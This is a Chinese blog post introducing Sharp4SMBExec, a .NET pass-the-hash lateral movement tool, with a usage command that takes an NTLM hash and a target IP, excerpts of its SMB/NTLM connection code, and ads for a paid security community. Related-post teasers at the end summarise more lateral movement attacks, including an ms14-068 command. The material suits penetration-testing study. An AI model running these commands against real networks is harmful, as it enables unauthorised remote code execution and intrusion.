.NET 一款支持NTLM实现横向移动的工具

最新推荐文章于 2024-10-12 16:13:55 发布
最新推荐文章于 2024-10-12 16:13:55 发布
阅读量286 收藏 7
点赞数 3
文章标签: .net 网络 安全 学习 web安全 矩阵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/141852511
版权

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02基本介绍

Sharp4SMBExec 是一个强大的横向移动工具,允许用户在目标计算机上通过 SMB 协议执行命令,而无需知道目标用户的明文密码。只需要提供用户的 NTLM 哈希即可。这对于渗透测试和红队行动非常有用,因为在获取到用户的 NTLM 哈希后,可以利用该工具在目标机器上执行任意命令。

图片

03使用方法

获取明文数据库连接字符命令行格式如下:username 是目标系统上的用户名,hash 是该用户的 NTLM 哈希,command 是要在目标机器上执行的命令,target 是目标计算机的 IP 地址。

Sharp4SMBExec.exe username:Ivan1ee hash:32ed87bdb5fdc5e9cba88547376818d4 command:c:\windows\system32\winver.exe target:192.168.101.141

04原理解析

工具的实现核心是利用 TcpClient 类来建立与目标计算机的 SMB 连接,并发送经过 NTLM 认证的 SMB 消息。以下是关键代码的解释:

TcpClient tcpClient = new TcpClient();
tcpClient.Client.ReceiveTimeout = 60000;
try
{
    tcpClient.Connect(text, 445);
}
catch
{
    stringBuilder.AppendLine("Could not connect to Target");
}

这段代码使用 TcpClient 尝试连接目标机器的 445 端口,这是 SMB 协议的默认端口。如果连接失败,将记录错误信息。下面这部分代码首先检查是否成功连接目标计算机。

if (tcpClient.Connected)
{
    if (flag3)
    {
        stringBuilder.AppendLine(string.Format("Connected to {0}", text));
    }
    NetworkStream stream = tcpClient.GetStream();
    byte[] array6 = new byte[1024];
    string text8 = "NegotiateSMB";
    byte[] bytesToSend;
    OrderedDictionary orderedDictionary = new OrderedDictionary();
    num2++;
    byte[] array9 = new byte[2];
    array9[0] = 1;
    orderedDictionary = SMBExec.SMB2Header(array9, num2, packet_tree_ID, packet_session_ID);
    OrderedDictionary packet_ordered_dictionary2 = SMBExec.NTLMSSPNegotiate(array2, null);
    byte[] array10 = Utilities.ConvertFromPacketOrderedDictionary(orderedDictionary);
    orderedDictionary2 = SMBExec.SMB2SessionSetupRequest(Utilities.ConvertFromPacketOrderedDictionary(packet_ordered_dictionary2));
    byte[] array11 = Utilities.ConvertFromPacketOrderedDictionary(orderedDictionary2);
    bytesToSend = Program.GetNetBIOSSessionService(array10.Length, array11.Length).Concat(array10).Concat(array11).ToArray<byte>();
}

然后,通过 NetworkStream 获取网络流并构造 SMB2 消息来进行初始协商(NegotiateSMB)和会话设置(SessionSetupRequest)。这些消息使用 NTLM 认证信息,以便后续的命令执行请求能够被目标机器识别和接受。

综上,Sharp4SMBExec 是一个强大的渗透测试工具,通过使用 NTLM 哈希,可以在目标计算机上远程执行命令。其实现原理基于 SMB 协议的操作与 NTLM 认证,是进行横向移动和攻击 Windows 环境的利器。工具已经打包在星球,感兴趣的朋友可以加入自取。

05.NET安全星球

dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,每日分享.NET安全技术干货以及交流解答各类技术等问题。

图片

图片

图片

星球20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

图片

.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输

图片

dot.Net安全矩阵
关注
内网渗透-内网环境下的横向移动总结
lza20001103的博客
04-14 1834
内网环境下的横向移动总结
内网渗透—横向移动&NTLM-Relay重放攻击&Responder中继攻击
2301_76227305的博客
08-24 672
可以看到整个实验下来我是没有抓取hash或者密码的,但是仍可以成功横移的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习
内网横向移动NTLM-Relay重放&Responder中继攻击&Ldap&Ews
剁椒鱼头没剁椒的博客
07-30 1246
在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。看配置是需要4h4g…
内网渗透测试:内网横向移动基础总结
KH_FC的博客
12-29 5791
内网渗透测试:内网横向移动基础总结 横向移动 在内网渗透中,当攻击者获取到内网某台机器的控制权后,会以被攻陷的主机为跳板,通过收集域内凭证等各种方法,访问域内其他机器,进一步扩大资产范围。通过此类手段,攻击者最终可能获得域控制器的访问权限,甚至完全控制基于Windows操作系统的整个内网环境,控制域环境下的全部机器。 在这篇文章中,我们来讲解一下横向移动的思路与攻击手法。 由于最近开学了有很多很多的事,所以一直没有时间更新,文章可能略显仓促,不足之处还请多多指教。 本文大多是我最近的学习总结,专为想我一样
内网渗透----域内横向移动
浅笑996的博客
12-20 6206
0x01.MS14-068 kerkeo工具 https://github.com/gentilkiwi/kekeo ) klist klist purge 删除所有票据 直接访问域控制器的C盘目录: dir \\qianxiao996-dm.qianxiao996.com\C$ 查看本机用户信息,记录用户名与SID号 whoami /all SID : S-1-5-21-2...
横向移动 – WinRM
zkaqlaoniao的博客
04-24 999
同学们可能没有听说过WinRM横向移动技术,今天我给大家分析讲解一波儿看不懂也没关系,先看看有个大概的概念,以后慢慢就懂了。
常见横向移动手法
qq_44657899的博客
11-08 3616
文章目录通过PsExec进行横向移动PsExec使用通过 WMIExec 来进⾏横向移动WMI使用方法 通过PsExec进行横向移动 PsExec 包含在 PsTools ⼯具包中,下载地址:https://download.sysinternals.com/files/PSTools.zip 通过 PsExec 可以在远程⽬标主机上执⾏命令,也可以将管理员权限提升到 System 权限以运⾏指定的程序。 PsExec 的基本原理是:通过管道在远程⽬标主机上创建⼀个 psexec 服务,并在本地磁盘中⽣成⼀
WMI利用(横向移动
Ping_Pig的博客
11-09 1811
WMI利用(横向移动) 讲在前面:     上一篇文章我们简单的解释了什么是WMI,WMI做什么,为什么使用WMI。本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章,希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。在横向移动中的固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI的意见。所以本文分为三个段落,信息收集、横向移动、部分意见。
7、内网安全-横向移动&PTH哈希&PTT票据&PTK密匙&Kerberos&密码喷射
m0_65842464的博客
02-17 1880
1、域横向移动-PTH-Mimikatz&NTLM;2、域横向移动-PTK-Mimikatz&AES256;3、域横向移动-PTT-漏洞&Kekeo&Ticket;4、Linux系统+Proxychains+CrackMapExec-密码喷射
具有Net-NTLM哈希捕获功能的面向Red Team的C#简单HTTP和WebDAV服务器-.NET开发
05-27
用于为横向移动目的在受损机器上提供有效载荷。 SharpWebServer这是一个用Red Hat C ++编写的面向Red Team的简单HTTP和WebDAV服务器,具有捕获Net-NTLM哈希的功能。 用于为横向移动目的在受损机器上提供有效载荷。 ...
SharpWebServer:具有Net-NTLM哈希捕获功能的面向Red Team的C#简单HTTP和WebDAV服务器
03-30
用于为横向移动目的在受损机器上提供有效载荷。 需要.NET Framework 4.5和System.Net和System.Net.Sockets引用。 用法 :: SharpWebServer :: a Red Team oriented C# Simple HTTP & WebDAV Server with Net-NTLM...
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 137
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&Kerberos&委派安全&非约束系&约束系&RBCD资源系&Spooler利用
HACKONE的博客
06-23 309
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。简而言之,非约束委派是指用户账户将自身的TGT转发给服务账户使用。委派是一种域内应用模式,是指将域内用户账户的权限委派给服务账号,服务账号因此能以用户的身份在域内展开活动(请求新的服务等),类似于租房中介房东的关系去理解。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。
.NET 通过C#设置Excel工作表的页面设置
最新发布
Eiceblue的专栏
10-12 297
本文演示如何在.NET平台使用C#设置Excel工作表页面常用设置。
.NET 中的 ConvertAll 和 Select 方法哪个性能好
专注于分享个人学习工作沉淀内容,不做网络搬运工
10-12 209
稍好一些,但都比 Select 方法慢得多,且分配的内存较多,垃圾回收次数也较高。方法的性能最好,因为它的执行时间最短,分配的内存最少,并且几乎不需要垃圾回收。因此,对于开头的问题,我的结论是两个方法的性能差不多,都可以使用。两个方法,在开发中实际上应该使用哪一个?.NET 的 List 中提供了。接下来通过基准测试脚本来对比性能。方法进行如下调整,重新测试。方法的执行时间非常接近,经过两次测试可以发现,
Spire.PDF for .NET【页面设置】演示:在 C#/VB.NET 中创建 PDF 小册子
励志做最业余的专业博主,控件产品可以私我~
10-09 712
本节将介绍一种通过C#、VB.NET 中的.NET PDF组件创建 PDF 小册子的非常简单的方法。
黑龙江等保测评详细指南
weixin_62641226的博客
10-08 499
黑龙江等保测评是保障信息系统安全的重要环节,通过科学的测评流程和专业的评估机构,帮助企业识别和应对安全风险。等保(信息安全等级保护)是指根据信息系统的重要性和安全需求,对其进行分级保护的制度。费用因测评机构、系统复杂性和测评等级而异,建议咨询具体测评机构获取报价。2. 风险管理:通过测评,识别系统中的安全风险,制定相应的防护措施。测评报告:测评机构出具正式的测评报告,包含评估结果和整改建议。选择测评机构:选择具有资质的第三方测评机构进行正式测评。整改落实:根据测评报告中的建议,进行系统的整改和优化。
NTLM口令加密算法C++实现
05-23
以下是NTLM口令加密算法的C++实现: ```cpp #include #include #include using namespace std; void LMHash(const char* pwd, unsigned char* lmhash) { unsigned char* p = lmhash; char password[14] = {0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值